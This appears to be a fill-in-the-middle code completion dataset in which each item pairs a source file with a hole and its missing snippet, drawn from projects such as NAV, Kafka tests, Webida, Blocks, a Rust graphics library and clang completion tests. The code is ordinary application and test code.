prompt: large_string (lengths 70 – 991k)
completion: large_string (lengths 0 – 1.02k)
<|file_name|>hp_httpmanageable_mib.py<|end_file_name|><|fim▁begin|># # Copyright (C) 2015 Uninett AS # # This file is part of Network Administration Visualized (NAV). # # NAV is free software: you can redistribute it and/or modify it under # the terms of the GNU General Public License version 3 as published by # the Free Software Foundation. # # This program is distributed in the hope that it will be useful, but WITHOUT # ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS # FOR A PARTICULAR PURPOSE. See the GNU General Public License for more # details. You should have received a copy of the GNU General Public License # along with NAV. If not, see <http://www.gnu.org/licenses/>. # from twisted.internet import defer from nav.smidumps import get_mib from nav.mibs.mibretriever import MibRetriever class HPHTTPManageableMib(MibRetriever): """HP-httpManageable-MIB (SEMI-MIB) MibRetriever""" mib = get_mib('SEMI-MIB') @defer.inlineCallbacks def get_serial_number(self): """Tries to get a chassis serial number from old HP switches"""<|fim▁hole|> serial = serial.decode("utf-8") defer.returnValue(serial)<|fim▁end|>
serial = yield self.get_next('hpHttpMgSerialNumber') if serial: if isinstance(serial, bytes):
<|file_name|>message_format_change_test.py<|end_file_name|><|fim▁begin|># Copyright 2015 Confluent Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from ducktape.mark import parametrize from ducktape.utils.util import wait_until from kafkatest.services.console_consumer import ConsoleConsumer from kafkatest.services.kafka import KafkaService from kafkatest.services.verifiable_producer import VerifiableProducer from kafkatest.services.zookeeper import ZookeeperService from kafkatest.tests.produce_consume_validate import ProduceConsumeValidateTest from kafkatest.utils import is_int from kafkatest.version import LATEST_0_9, LATEST_0_10, TRUNK, KafkaVersion class MessageFormatChangeTest(ProduceConsumeValidateTest): def __init__(self, test_context): super(MessageFormatChangeTest, self).__init__(test_context=test_context) def setUp(self): self.topic = "test_topic" self.zk = ZookeeperService(self.test_context, num_nodes=1) self.zk.start()<|fim▁hole|> self.producer_throughput = 10000 self.num_producers = 1 self.num_consumers = 1 self.messages_per_producer = 100 def produce_and_consume(self, producer_version, consumer_version, group): self.producer = VerifiableProducer(self.test_context, self.num_producers, self.kafka, self.topic, throughput=self.producer_throughput, message_validator=is_int, version=KafkaVersion(producer_version)) self.consumer = ConsoleConsumer(self.test_context, self.num_consumers, self.kafka, self.topic, new_consumer=False, consumer_timeout_ms=30000, message_validator=is_int, version=KafkaVersion(consumer_version)) self.consumer.group_id = group self.run_produce_consume_validate(lambda: wait_until( lambda: self.producer.each_produced_at_least(self.messages_per_producer) == True, timeout_sec=120, backoff_sec=1, err_msg="Producer did not produce all messages in reasonable amount of time")) @parametrize(producer_version=str(TRUNK), consumer_version=str(TRUNK)) @parametrize(producer_version=str(LATEST_0_9), consumer_version=str(LATEST_0_9)) def test_compatibility(self, producer_version, consumer_version): """ This tests performs the following checks: The workload is a mix of 0.9.x and 0.10.x producers and consumers that produce to and consume from a 0.10.x cluster 1. initially the topic is using message format 0.9.0 2. change the message format version for topic to 0.10.0 on the fly. 3. change the message format version for topic back to 0.9.0 on the fly. - The producers and consumers should not have any issue. 
- Note that for 0.9.x consumers/producers we only do steps 1 and 2 """ self.kafka = KafkaService(self.test_context, num_nodes=3, zk=self.zk, version=TRUNK, topics={self.topic: { "partitions": 3, "replication-factor": 3, 'configs': {"min.insync.replicas": 2}}}) self.kafka.start() self.logger.info("First format change to 0.9.0") self.kafka.alter_message_format(self.topic, str(LATEST_0_9)) self.produce_and_consume(producer_version, consumer_version, "group1") self.logger.info("Second format change to 0.10.0") self.kafka.alter_message_format(self.topic, str(LATEST_0_10)) self.produce_and_consume(producer_version, consumer_version, "group2") if producer_version == str(TRUNK) and consumer_version == str(TRUNK): self.logger.info("Third format change back to 0.9.0") self.kafka.alter_message_format(self.topic, str(LATEST_0_9)) self.produce_and_consume(producer_version, consumer_version, "group3")<|fim▁end|>
# Producer and consumer
<|file_name|>hwiOperation.py<|end_file_name|><|fim▁begin|><|fim▁hole|>class LedOperation(Operation): opcodes = {"but": "1111100"} structure = [Opcodes(opcodes), Zero(21), Register] class ButOperation(Operation): opcodes = {"led": "1111101"} structure = [Opcodes(opcodes), Operand2(25)]<|fim▁end|>
from .operation import Operation from ..operands import Register, Operand2, Opcodes, Zero
<|file_name|>GetDischargeSummaries.java<|end_file_name|><|fim▁begin|>package gov.va.medora.mdws.emrsvc; import javax.xml.bind.annotation.XmlAccessType; import javax.xml.bind.annotation.XmlAccessorType; import javax.xml.bind.annotation.XmlRootElement; import javax.xml.bind.annotation.XmlType; /** * <p>Java class for anonymous complex type. * * <p>The following schema fragment specifies the expected content contained within this class. * * <pre> * &lt;complexType> * &lt;complexContent> * &lt;restriction base="{http://www.w3.org/2001/XMLSchema}anyType"> * &lt;sequence> * &lt;element name="fromDate" type="{http://www.w3.org/2001/XMLSchema}string" minOccurs="0"/> * &lt;element name="toDate" type="{http://www.w3.org/2001/XMLSchema}string" minOccurs="0"/> * &lt;element name="nNotes" type="{http://www.w3.org/2001/XMLSchema}int"/> * &lt;/sequence> * &lt;/restriction> * &lt;/complexContent> * &lt;/complexType> * </pre> * * */ @XmlAccessorType(XmlAccessType.FIELD) @XmlType(name = "", propOrder = { "fromDate", "toDate", "nNotes" }) @XmlRootElement(name = "getDischargeSummaries") public class GetDischargeSummaries { protected String fromDate; protected String toDate; protected int nNotes; /** * Gets the value of the fromDate property. * * @return * possible object is * {@link String } * */ public String getFromDate() { return fromDate; } /** * Sets the value of the fromDate property. * * @param value * allowed object is * {@link String } * */ public void setFromDate(String value) { this.fromDate = value; } /** * Gets the value of the toDate property. * * @return * possible object is * {@link String } * */ public String getToDate() { return toDate; } /** * Sets the value of the toDate property. * * @param value * allowed object is * {@link String } * */ public void setToDate(String value) { this.toDate = value; } /** * Gets the value of the nNotes property. * */ public int getNNotes() { return nNotes; } /** * Sets the value of the nNotes property. * */ public void setNNotes(int value) { this.nNotes = value; <|fim▁hole|> }<|fim▁end|>
}
<|file_name|>precomp.cpp<|end_file_name|><|fim▁begin|>////////////////////////////////////////////////////////////////////// // // THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF // ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED // TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A // PARTICULAR PURPOSE.<|fim▁hole|>// // PreComp.cpp // // Stub for vc precompiled header. // ////////////////////////////////////////////////////////////////////// #include "globals.h"<|fim▁end|>
// // Copyright (C) 2003 Microsoft Corporation. All rights reserved.
<|file_name|>cargop.rs<|end_file_name|><|fim▁begin|><|fim▁hole|> extern crate cargopants; fn main() { let mut cargo = cargopants::Client::new(); println!("latest version {:?}", cargo.krate("url").get().unwrap()); println!("krate {:?}", cargo.krate("url").version("0.2.25").get().unwrap()); }<|fim▁end|>
//#![deny(warnings)]
<|file_name|>test_property_delete.py<|end_file_name|><|fim▁begin|>""" Unit tests to ensure that we can call reset_traits/delete on a property trait (regression tests for Github issue #67). """ from traits import _py2to3 from traits.api import Any, HasTraits, Int, Property, TraitError from traits.testing.unittest_tools import unittest class E(HasTraits): a = Property(Any) b = Property(Int) class TestPropertyDelete(unittest.TestCase): def test_property_delete(self): e = E()<|fim▁hole|> with self.assertRaises(TraitError): del e.b def test_property_reset_traits(self): e = E() unresetable = e.reset_traits() _py2to3.assertCountEqual(self, unresetable, ['a', 'b'])<|fim▁end|>
with self.assertRaises(TraitError): del e.a
<|file_name|>main_bak.js<|end_file_name|><|fim▁begin|>/* * Copyright (c) 2012-2015 S-Core Co., Ltd. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ require([ 'common', 'lodash', 'moment', 'async', 'text!resource/add_wsdlg.html', 'text!resource/remove_wsdlg.html' ], function (common, _, moment, async, addDlg, removeDlg) { 'use strict'; /* global webidaFs, webidaApp, webidaAuth, webidaHost: true */ var WORKSPACE_PATH = '.profile/workspace.json'; var WORKSPACE_INFO; //var _menuSettings = $('#menu-settings'); var _wsContents = $('.ws-body'); var _dimming = $('.dimming'); var _uniqId; function _dimmingOn() { _dimming.addClass('active'); } function _dimmingOff() { _dimming.removeClass('active'); } function _checkValidWSFile(cb) { webidaFs.readFile(WORKSPACE_PATH, function (err, data) { if (err) { cb('_checkValidWSFile() - readFile Error: ' + err); } else { var wsMeta = JSON.parse(data); var wsMetaCount = Object.keys(wsMeta).length; _getWSList(function (err, wslist) { if (err) { cb('_checkValidWSFile() - _getWSList Error: ' + err); } else { var wsCount = wslist.length; if (wsMetaCount === wsCount) { cb(null, true); } else { cb(null, false); } } }); } }); } function _launchIDE(domObj) { console.log($(domObj).attr('data-wsname')); var workspace = '?workspace=' + webidaFs.fsid + '/' + domObj.attr('data-wsname'); webidaApp.launchApp('devenv', true, workspace); } function _registerDefaultEvent() { // register dimming cancel event _dimming.on('click', function () { _dimming.removeClass('active'); var addWSDlg = $('.add_wsdlg'); var removeWSDlg = $('.remove_wsdlg'); if (addWSDlg) { addWSDlg.remove(); } if (removeWSDlg) { removeWSDlg.remove(); } }); $('#menu-logo').on('click', function () { webidaApp.launchApp('desktop', false, null); }); // register workspace event $('#menu-ws').on('click', function () { var wswrap = $('.ws-wrap'); var settingwrap = $('.settings-wrap'); if (wswrap.hasClass('acitve')) { settingwrap.removeClass('active'); } else { wswrap.addClass('active'); settingwrap.removeClass('active'); } }); // register setting event $('#menu-settings').on('click', function () { var wswrap = $('.ws-wrap'); var settingwrap = $('.settings-wrap'); if (settingwrap.hasClass('acitve')) { wswrap.removeClass('active'); } else { settingwrap.addClass('active'); wswrap.removeClass('active'); } }); // register logout event $('#menu-logout').on('click', function () { _setLogout(); }); // register workspace add event $('.ws-icon-add').on('click', function () { _addWSList(); }); } // WORKSPACE_PATH 파일이 있는지 없는지 여부 확인 후 없으면 생성. 
function _initialize() { _registerDefaultEvent(); webidaFs.exists(WORKSPACE_PATH, function (err, exist) { if (err) { console.log('_checkWSFile() - exists Error: ' + err); } if (!exist) { _setWorkspace(function (err) { if (err) { console.log(err); } _renderWSList(); }); } else { _checkValidWSFile(function (err, bool) { if (err) { console.log(err); } else { if (bool) { _renderWSList(); } else { console.log('workspace meta-info is invalid.'); _renderWSList(); } } }); } }); } // WORKSPACE 목록 생성 및 WORKSPACE_PATH에 정보 저장. function _setWorkspace(cb) { webidaFs.list('/', function (err, data) { if (err) { console.log('setWorkspace() - list Error: ' + err); cb(err); } else { var WSList = _.chain(data).filter(function (fileObj) { if (!fileObj.name.match(/^\./) && fileObj.isDirectory) { return true; } }).map(function (fileObj) { return '/' + fileObj.name; }).value(); webidaFs.stat(WSList, function (err, stats) { if (err) { console.log('setWorkspace() - stat Error: ' + err); cb(err); } else { var wsObj = {}; _.forEach(stats, function (fileObj) { fileObj.birth = ''; fileObj.desc = ''; wsObj[fileObj.name] = fileObj; }); webidaFs.writeFile(WORKSPACE_PATH, JSON.stringify(wsObj), function (err) { if (err) { console.log('setWorkspace() - writeFile Error: ' + err); cb(err); } else { cb(null, true); } }); } }); } }); } // 유니크 id 생성. function _genUniuqeId() { _uniqId = _.uniqueId(); return _uniqId; } // 로그아웃 function _setLogout() { webidaAuth.logout(function (err) { if (err) { alert('Failed to logout'); } else { location.href = '//' + webidaHost; } }); } function _getWSList(cb) { webidaFs.list('/', function (err, data) { if (err) { cb(err); } else { var WSList = _.chain(data).filter(function (fileObj) { if (!fileObj.name.match(/^\./) && fileObj.isDirectory) { return true; } }).map(function (fileObj) { return '/' + fileObj.name; }).value(); webidaFs.stat(WSList, function (err, stats) { if (err) { cb(err); } else { cb(null, stats); } }); } }); } // 프로젝트 목록 얻어오기 function _getPJListPath(WSPath, cb) { webidaFs.list(WSPath, function (err, pjList) { if (err) { cb(err); } else { var filteredPJList = _.chain(pjList).filter(function (file) { if (!file.name.match('.workspace') && file.isDirectory) { return true; } }).map(function (file) { return WSPath + '/' + file.name + '/.project/project.json'; }).value(); return cb(null, filteredPJList); } }); } // 프로젝트 목록 그리기 function _renderPJList(domObj) { var ws = domObj.attr('data-wspath'); var wsRow = domObj.parent(); if (wsRow.hasClass('ws-closed')) { wsRow.addClass('ws-opened'); wsRow.removeClass('ws-closed'); wsRow.after('<div class="pj-body" data-id="' + wsRow.attr('data-id') + '"></div>'); var proRow = wsRow.next(); _getPJListPath(ws, function (err, pjPathList) { if (err) { console.log('_renderPJList() - _getPJListPath Error: ' + err); } else { _.forEach(pjPathList, function (pjPath) { webidaFs.exists(pjPath, function (err, exist) { if (err) { console.log('_renderPJList() - exists Error: ' + err); } if (exist) { webidaFs.readFile(pjPath, function (err, data) { if (err) { console.log('_renderPJList() - read Error: ' + err); } else { var projInfo = JSON.parse(data); /* jshint maxlen : 200 */ var template = '<div class="pj-row"">' + '<div class="pj-content">' + '<div class="pj-item pj-arrow"></div>' + '<div class="pj-item pj-name">' + projInfo.name + '</div>' + '<div class="pj-item pj-ltime"></div>' + '<div class="pj-item pj-birth">' + moment(projInfo.created).fromNow() + '</div>' + '<div class="pj-item pj-desc">' + projInfo.description + '</div>' + '</div>' + '<div 
class="pj-content-icon">' + '</div>' + '</div>'; /* jshint maxlen:120 */ proRow.append(template); } }); } }); }); } }); } else { var projRow = wsRow.next(); if (projRow.hasClass('pj-body') && (projRow.attr('data-id') === wsRow.attr('data-id'))) { projRow.remove(); wsRow.removeClass('ws-opened'); wsRow.addClass('ws-closed'); } } } // 워크스페이스 목록 그리기 function _renderWSList() { if (_wsContents.children.length) { _wsContents.empty(); } webidaFs.readFile(WORKSPACE_PATH, function (err, data) { if (err) { console.log('_renderWSList() - readFile Error: ' + err); } else { var wsObj = JSON.parse(data); WORKSPACE_INFO = wsObj; _.forEach(wsObj, function (ws) { var id = _genUniuqeId(); var birth = ''; var desc = ''; if (ws.birth) { birth = moment(ws.birth).fromNow(); } if (ws.desc) { desc = ws.desc; } /* jshint maxlen : 200 */ var template = '<div class="ws-row ws-closed" data-id="' + id + '">' + '<div class="ws-content" data-wspath="' + ws.path + '">' + '<div class="ws-item ws-arrow"></div>' + '<div class="ws-item ws-name">' + ws.name + '</div>' + '<div class="ws-item ws-ltime">' + moment(ws.mtime).fromNow() + '</div>' + '<div class="ws-item ws-birth">' + birth + '</div>' + '<div class="ws-item ws-desc">' + desc + '</div>' + '</div>' + '<div class="ws-content-icon">' + '<div class="ws-launch">' + '<div class="ws-icon-launch" title="Launch IDE" data-wsname="' + ws.name + '"></div>' + '</div>' + '<div class="ws-delete">' + '<div class="ws-icon-delete" title="Delete Workspace" data-wsname="' + ws.name + '" data-id="' + id + '"></div>' + '</div>' + '</div>' + '</div>'; /* jshint maxlen : 120 */ _wsContents.append(template); }); // register get project event $('.ws-body .ws-content').on('click', function (evt) { var domObj = $(evt.target).parent(); _renderPJList(domObj); }); // register launch event $('.ws-icon-launch').on('click', function (evt) { var domObj = $(evt.target); _launchIDE(domObj); }); $('.ws-icon-delete').on('click', function (evt) { var domObj = $(evt.target); _removeWSList(domObj); }); } }); } function _addWSList() { _dimmingOn(); $('body').append(addDlg); // register dialog close event $('.adddlg_close').on('click', function () { $('.add_wsdlg').remove(); _dimmingOff(); }); // input에 포커스 $('#workspace_name').focus(); $('#workspace_name').on('keyup', function () { var wsname = this.value; if (wsname) { $('#adddlg_message').text(''); } }); // register create workspace event $('#adddlg_confirm').on('click', function (evt) { evt.preventDefault(); var wsname = $('#workspace_name').val(); var wsdesc = $('#workspace_desc').val(); var message = $('#adddlg_message'); if (!wsname) { message.text('Please enter workspace name.'); return; } _getWSList(function (err, wslist) { if (err) { console.log('_addWSList()' + err); } else { var isExist = _.find(wslist, { 'name' : wsname }); if (isExist) { message.text('\'' + wsname + '\' worskpace is already existed.'); return; } else { // create workspace var WS_META_PATH = wsname + '/.workspace'; var WS_META_FILE = WS_META_PATH + '/workspace.json'; async.waterfall([ function (next) { webidaFs.createDirectory(wsname, false, function (err) { if (err) { next('_addWSList() - 1st createDirectory Error:' + err); } else { next(); } }); }, function (next) { webidaFs.createDirectory(WS_META_PATH, false, function (err) { if (err) { next('_addWSList() - 2nd createDirectory Error:' + err); } else { next(); } }); }, function (next) { webidaFs.writeFile(WS_META_FILE, '', function (err) { if (err) { next('_addWSList() - 1st writeFile Error:' + err); } else { next(); } }); }, 
function (next) { webidaFs.stat([wsname], function (err, stats) { if (err) { next('_addWSList() - stat Error:' + err); } else { stats[0].birth = new Date().toJSON(); stats[0].desc = wsdesc; WORKSPACE_INFO[wsname] = stats[0]; next(); } }); }, function (next) { webidaFs.writeFile(WORKSPACE_PATH, JSON.stringify(WORKSPACE_INFO), function (err) { if (err) { next('_addWSList() - 2nd writeFile Error:' + err); } else { next(); } }); } ], function (err) { if (err) { console.log(err); } else { $('.add_wsdlg').remove(); _dimmingOff(); _renderWSList(); } }); } } }); }); } function _removeWSList(domObj) {<|fim▁hole|> $('.removedlg_close').on('click', function () { $('.remove_wsdlg').remove(); _dimmingOff(); }); var deleteWSname = domObj.attr('data-wsname'); var msg = '<p>This action <strong style="color:#fff">CANNOT</strong> be undone. ' + 'This will delete the <span style="color:#fff; font-weight:bold;">' + deleteWSname + '</span> workspace and projects permanetly.</p>' + '<p>Please type in the name of the workspace to confirm.</p>'; $('.removedlg_warning_text').html(msg); // input에 포커스 $('#workspace_name').focus(); $('#workspace_name').on('keyup', function () { var wsname = this.value; if (wsname) { $('#removedlg_message').text(''); } }); $('#removedlg_confirm').on('click', function (evt) { evt.preventDefault(); var wsname = $('#workspace_name').val(); var message = $('#removedlg_message'); if (!wsname) { message.text('Please enter workspace name.'); return; } else if (wsname !== deleteWSname) { message.text('workspace name doesn\'t match.'); return; } if (WORKSPACE_INFO[deleteWSname]) { delete WORKSPACE_INFO[deleteWSname]; async.waterfall([ function (next) { webidaFs.writeFile(WORKSPACE_PATH, JSON.stringify(WORKSPACE_INFO), function (err) { if (err) { err('_removeWSList() - writeFile Error: ' + err); } else { next(); } }); }, function (next) { webidaFs.delete(deleteWSname, true, function (err) { if (err) { next('_removeWSList() - delete Error:' + err); } else { next(); } }); } ], function (err) { if (err) { console.log(err); } else { var id = domObj.attr('data-id'); var selectorWS = '.ws-row[data-id=' + id + ']'; var selectorProj = '.pj-body[data-id=' + id + ']'; $(selectorWS).remove(); if ($(selectorProj)) { $(selectorProj).remove(); } $('.remove_wsdlg').remove(); _dimmingOff(); } }); } }); } common.getFS(function (exist) { if (exist) { _initialize(); } else { location.href = '//' + webidaHost; } }); });<|fim▁end|>
_dimmingOn(); $('body').append(removeDlg);
<|file_name|>index.d.ts<|end_file_name|><|fim▁begin|>/* * Copyright (c) Microsoft Corporation. All rights reserved. * Licensed under the MIT License. See License.txt in the project root for * license information. * * Code generated by Microsoft (R) AutoRest Code Generator. * Changes may cause incorrect behavior and will be lost if the code is * regenerated. */ /** * @class * Initializes a new instance of the AvailabilitySetUpdateParameters class. * @constructor * @member {object} tags A set of tags. A description about the set of tags. *<|fim▁hole|>export interface AvailabilitySetUpdateParameters { tags: { [propertyName: string]: string }; }<|fim▁end|>
*/
<|file_name|>__init__.py<|end_file_name|><|fim▁begin|>import theano from theano import shared, tensor from blocks.bricks import Feedforward, Activation from blocks.bricks.base import application, lazy from blocks_extras.initialization import PermutationMatrix from blocks_extras.utils import check_valid_permutation from blocks.utils import shared_floatx class FixedPermutation(Feedforward): """Perform a fixed permutation of the input features. Parameters ---------- order : ndarray-like A 1-dimensional container containing a permutation on the integers. dot : bool, optional Whether or not to perform the permutation by matrix multiplication. This may be faster in some circumstances but requires allocation of a permutation matrix. """ @lazy(allocation=['order']) def __init__(self, order, dot=True, **kwargs): self.order = order self._dot = dot super(FixedPermutation, self).__init__(**kwargs) def _allocate(self): self.order = check_valid_permutation(self.order) if self.input_dim != len(self.order): raise ValueError("input_dim does not match length of order " "vector") # No roles assigned here, since these are not learnable parameters. if self._dot: shape = (self.order.shape[0], self.order.shape[0]) self._matrix = shared_floatx( PermutationMatrix(self.order).generate(None, shape)) else: order = self.order.astype('int32') assert order.min() == 0 # Catch highly unlikely downcast issue. self._permutation = shared(order) @property def input_dim(self): return len(self.order) @application(inputs=['input_'], outputs=['output_']) def apply(self, input_):<|fim▁hole|> else: return tensor.take(input_, self._permutation, axis=1) class Softsign(Activation): @application(inputs=['input_'], outputs=['output']) def apply(self, input_): one = tensor.constant(1, dtype=theano.config.floatX) return input_ / (one + abs(input_))<|fim▁end|>
if self._dot: return tensor.dot(input_, self._matrix)
<|file_name|>test_client_authorize.py<|end_file_name|><|fim▁begin|>import collections import json import unittest import responses from requests import HTTPError from mock import patch from batfish import Client from batfish.__about__ import __version__ class TestClientAuthorize(unittest.TestCase): def setUp(self): with patch('batfish.client.read_token_from_conf', return_value=None): self.cli = Client() @responses.activate def test_authorize_error(self): url = "https://api.digitalocean.com/v2/actions" responses.add(responses.GET, url, body='{"error": "something"}', status=500, content_type="application/json") with self.assertRaises(HTTPError): self.cli.authorize("test_token") @responses.activate def test_authorize_unauthorized(self): url = "https://api.digitalocean.com/v2/kura"<|fim▁hole|> body = {'id': "unauthorized", 'message': "Unable to authenticate you."} responses.add(responses.GET, url, body=json.dumps(body), status=401, content_type="application/json") self.cli.authorize("test_token") self.assertEquals(responses.calls[0].response.status_code, 401) @responses.activate def test_authorize_unauthorized(self): url = "https://api.digitalocean.com/v2/actions" responses.add(responses.GET, url, body='{"error": "something"}', status=200, content_type="application/json") auth = self.cli.authorize("test_token") self.assertEquals(auth, "OK") self.assertEquals(responses.calls[0].response.status_code, 200)<|fim▁end|>
<|file_name|>0001_initial.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*- from __future__ import unicode_literals from django.db import models, migrations <|fim▁hole|> operations = [ migrations.CreateModel( name='Prueba', fields=[ ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)), ('nombre', models.CharField(max_length=100)), ], options={ }, bases=(models.Model,), ), ]<|fim▁end|>
class Migration(migrations.Migration): dependencies = [ ]
<|file_name|>ellipse.rs<|end_file_name|><|fim▁begin|>//! Draw ellipse<|fim▁hole|> pub use rectangle::centered; pub use rectangle::centered_square as circle; /// Ellipse border #[derive(Copy, Clone)] pub struct Border { /// The border color pub color: Color, /// The border radius pub radius: Radius, } /// An ellipse with filled color #[derive(Copy, Clone)] pub struct Ellipse { /// The ellipse color pub color: Color, /// The ellipse border pub border: Option<Border>, /// The resolution for the shape, 360 degrees. pub resolution: Resolution, } impl Ellipse { /// Creates a new ellipse pub fn new(color: Color) -> Ellipse { Ellipse { color: color, border: None, resolution: 128, } } /// Creates a new ellipse border pub fn new_border(color: Color, radius: Radius) -> Ellipse { Ellipse { color: [0.0; 4], border: Some(Border { color: color, radius: radius, }), resolution: 128, } } /// Sets ellipse color. pub fn color(mut self, value: Color) -> Self { self.color = value; self } /// Sets ellipse border. pub fn border(mut self, value: Border) -> Self { self.border = Some(value); self } /// Sets optional ellipse border. pub fn maybe_border(mut self, value: Option<Border>) -> Self { self.border = value; self } /// Sets resolution of the ellipse smoothness. pub fn resolution(mut self, value: Resolution) -> Self { self.resolution = value; self } /// Draws ellipse by corners using default method. #[inline(always)] pub fn draw_from_to<P: Into<crate::types::Vec2d>, G>(&self, from: P, to: P, draw_state: &DrawState, transform: Matrix2d, g: &mut G) where G: Graphics { use rectangle::rectangle_by_corners; let from = from.into(); let to = to.into(); g.ellipse(self, rectangle_by_corners(from[0], from[1], to[0], to[1]), draw_state, transform); } /// Draws ellipse using default method. #[inline(always)] pub fn draw<R: Into<Rectangle>, G>(&self, rectangle: R, draw_state: &DrawState, transform: Matrix2d, g: &mut G) where G: Graphics { g.ellipse(self, rectangle, draw_state, transform); } /// Draws ellipse using triangulation. pub fn draw_tri<R: Into<Rectangle>, G>(&self, rectangle: R, draw_state: &DrawState, transform: Matrix2d, g: &mut G) where G: Graphics { let rectangle = rectangle.into(); g.tri_list(draw_state, &self.color, |f| { triangulation::with_ellipse_tri_list(self.resolution, transform, rectangle, |vertices| f(vertices)) }); if let Some(Border { color, radius: border_radius }) = self.border { g.tri_list(&draw_state, &color, |f| { triangulation::with_ellipse_border_tri_list(self.resolution, transform, rectangle, border_radius, |vertices| f(vertices)) }); } } } #[cfg(test)] mod test { use super::*; #[test] fn test_ellipse() { let _ellipse = Ellipse::new([1.0; 4]) .color([0.0; 4]) .border(Border { color: [1.0; 4], radius: 3.0, }); } }<|fim▁end|>
use types::{Color, Radius, Rectangle, Resolution}; use {triangulation, DrawState, Graphics}; use math::Matrix2d;
<|file_name|>0002_auto_20161030_1553.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*- # Generated by Django 1.10.2 on 2016-10-30 12:53 from __future__ import unicode_literals <|fim▁hole|>from django.db import migrations class Migration(migrations.Migration): dependencies = [ ('core', '0001_initial'), ] operations = [ migrations.RemoveField( model_name='user', name='added', ), migrations.RemoveField( model_name='user', name='changed', ), ]<|fim▁end|>
<|file_name|>setup.py<|end_file_name|><|fim▁begin|>from setuptools import setup, find_packages with open('pyluno/meta.py') as f: exec(f.read()) setup( name='pyluno', version=__version__, packages=find_packages(exclude=['tests']), description='A Luno API for Python', author='Cayle Sharrock/Grant Stephens', author_email='[email protected]', scripts=['demo.py'], install_requires=[ 'futures>=3.0.3', 'nose>=1.3.7', 'requests>=2.8.1', 'pandas>=0.17.0', ], license='MIT', url='https://github.com/grantstephens/pyluno', download_url='https://github.com/grantstephens/pyluno/tarball/%s' % (__version__, ), keywords='Luno Bitcoin exchange API', classifiers=[ 'Development Status :: 5 - Production/Stable', 'Intended Audience :: Developers', 'License :: OSI Approved :: MIT License', 'Topic :: Office/Business :: Financial', 'Topic :: Utilities', 'Programming Language :: Python :: 2', 'Programming Language :: Python :: 2.6', 'Programming Language :: Python :: 2.7', 'Programming Language :: Python :: 3', 'Programming Language :: Python :: 3.2', 'Programming Language :: Python :: 3.3', 'Programming Language :: Python :: 3.4', 'Programming Language :: Python :: 3.5', 'Programming Language :: Python :: 3.6', ], test_suite='tests', extras_require={<|fim▁hole|><|fim▁end|>
'test': ['requests-mock>=0.7.0', 'nose'], } )
<|file_name|>build_insert_query.rs<|end_file_name|><|fim▁begin|>extern crate rustorm; extern crate uuid; extern crate chrono; extern crate rustc_serialize; use uuid::Uuid; use rustorm::query::Query; use rustorm::dao::{Dao, IsDao}; use rustorm::pool::ManagedPool; #[derive(Debug, Clone)] pub struct Photo { pub photo_id: Uuid, pub url: Option<String>, } impl IsDao for Photo{ fn from_dao(dao: &Dao) -> Self { Photo { photo_id: dao.get("photo_id"), url: dao.get_opt("url"), } } fn to_dao(&self) -> Dao { let mut dao = Dao::new(); dao.set("photo_id", &self.photo_id); match self.url { Some(ref _value) => dao.set("url", _value), None => dao.set_null("url"), } dao } } #[test] fn test_insert_query() { let url = "postgres://postgres:p0stgr3s@localhost/bazaar_v6"; let pool = ManagedPool::init(&url, 1).unwrap(); let db = pool.connect().unwrap(); let mut query = Query::insert(); query.into_table("bazaar.product") .set("name", &"product1") .returns(vec!["category.name"]); let frag = query.build(db.as_ref());<|fim▁hole|> VALUES ($1 )\x20 RETURNING name ".to_string(); println!("actual: {{\n{}}} [{}]", frag.sql, frag.sql.len()); println!("expected: {{{}}} [{}]", expected, expected.len()); assert!(frag.sql.trim() == expected.trim()); }<|fim▁end|>
let expected = " INSERT INTO bazaar.product( name )\x20
<|file_name|>ListAvatarViewHolder.java<|end_file_name|><|fim▁begin|>package com.michaelfotiadis.crossyscore.ui.components.addplayer.avatar; import android.view.View; import android.widget.ImageView; import com.michaelfotiadis.crossyscore.R; import com.michaelfotiadis.crossyscore.ui.core.common.viewholder.BaseViewHolder;<|fim▁hole|>public final class ListAvatarViewHolder extends BaseViewHolder { private static final int LAYOUT_ID = R.layout.list_item_single_image; @Bind(R.id.image) protected ImageView image; public ListAvatarViewHolder(final View view) { super(view); } public static int getLayoutId() { return LAYOUT_ID; } }<|fim▁end|>
import butterknife.Bind;
<|file_name|>templates.cpp<|end_file_name|><|fim▁begin|><|fim▁hole|> public: void in_base(); }; template<typename T, typename Alloc = std::allocator<T> > class vector : Alloc { public: void foo(); void stop(); }; template<typename Alloc> class vector<bool, Alloc>; } void f() { std::vector<int> v; v.foo(); // RUN: %clang_cc1 -fsyntax-only -code-completion-at=%s:18:8 %s -o - | FileCheck -check-prefix=CHECK-CC1 %s // CHECK-CC1: allocator<<#typename T#>> // CHECK-CC1-NEXT: vector<<#typename T#>{#, <#typename Alloc#>#}> // RUN: %clang_cc1 -fsyntax-only -code-completion-at=%s:19:5 %s -o - | FileCheck -check-prefix=CHECK-CC2 %s // CHECK-CC2: foo // CHECK-CC2: in_base // CHECK-CC2: stop } template <typename> struct X; template <typename T> struct X<T*> { X(double); }; X<int*> x(42); // RUN: %clang_cc1 -fsyntax-only -code-completion-at=%s:32:11 %s -o - | FileCheck -check-prefix=CHECK-CONSTRUCTOR %s // CHECK-CONSTRUCTOR: OVERLOAD: X(<#double#>) // (rather than X<type-parameter-0-0 *>(<#double#>)<|fim▁end|>
namespace std { template<typename T> class allocator {
